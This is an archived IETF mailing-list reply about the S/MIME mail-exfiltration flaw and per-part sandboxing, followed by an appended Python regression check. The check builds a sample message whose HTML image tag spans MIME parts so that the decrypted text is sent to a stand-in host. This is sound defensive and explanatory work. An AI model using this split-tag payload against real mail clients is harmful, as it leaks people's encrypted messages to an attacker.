Re: [lamps] More mail madness?
Russ Housley <housley@vigilsec.com> Mon, 14 May 2018 16:37 UTC
From: Russ Housley <housley@vigilsec.com>
Date: Mon, 14 May 2018 12:37:28 -0400
Cc: Phillip Hallam-Baker <phill@hallambaker.com>, IETF <ietf@ietf.org>, LAMPS <spasm@ietf.org>
To: Paul Wouters <paul@nohats.ca>
Archived-At: <https://mailarchive.ietf.org/arch/msg/spasm/xWk_UViXEpZcRyxiOB3BfPLxU7A>

> On May 14, 2018, at 12:35 PM, Paul Wouters <paul@nohats.ca> wrote:
>
>> On May 14, 2018, at 12:29, Russ Housley <housley@vigilsec.com> wrote:
>>
>> We are working on text for S/MIME that says that each portion of a MIME multi-part needs to be handled in its own sandbox. The direct exfiltration that is described happens because the mail user agent glues the various portions together for display to the user, which in the example on the web page causes an image to be fetched from the attacker's website with the message plaintext as part of the URL.
>
> So that’s the bandaid. What and where will work be done on a solution?

LAMPS just sent an update to the S/MIME message document to the IESG. My guess is that there will be discussion on the spasm@ietf.org mail list.

Russ
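
The per-part handling discussed in the message above, as an added example that is not part of the original thread or of any mail client's code: it parses one constructed multipart message twice, once with the portions glued into a single document and once with each HTML portion parsed on its own, and reports which fetchable URLs would carry the decrypted text. The message, the `SECRET` value, the `example.invalid` host and all function names are assumptions made for illustration, and the middle part only stands in for the output of S/MIME decryption.

```python
from email import message_from_string, policy
from html.parser import HTMLParser

SECRET = "CONSTRUCTED-DECRYPTED-PLAINTEXT"  # constructed stand-in value
# Constructed sample message. The middle part stands in for the output of
# S/MIME decryption (assumption: no real cryptography is performed here).
RAW = (
    'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="B"\n\n'
    '--B\nContent-Type: text/html\n\n<img src="http://example.invalid/\n'
    f"--B\nContent-Type: text/plain\n\n{SECRET}\n"
    '--B\nContent-Type: text/html\n\n">\n--B--\n'
)
MSG = message_from_string(RAW, policy=policy.default)


class UrlCollector(HTMLParser):
    """Collect src/href values, i.e. URLs a renderer could fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [v for k, v in attrs if k in ("src", "href") and v]


def urls_in(html):
    parser = UrlCollector()
    parser.feed(html)
    parser.close()
    return parser.urls


def glued_urls(msg):
    # Behaviour described in the thread: all portions joined into one document.
    return urls_in("".join(p.get_content() for p in msg.walk() if not p.is_multipart()))


def sandboxed_urls(msg):
    # Each HTML portion parsed in its own context; markup cannot span parts.
    return [u for p in msg.walk() if p.get_content_type() == "text/html"
            for u in urls_in(p.get_content())]


def leaks(urls, plaintext):
    """Return the URLs that carry the decrypted plaintext."""
    return [u for u in urls if plaintext in u]
```

Run as a regression check against a renderer's part-handling logic, `leaks(sandboxed_urls(MSG), SECRET)` must stay empty while the glued variant shows what the check is guarding against.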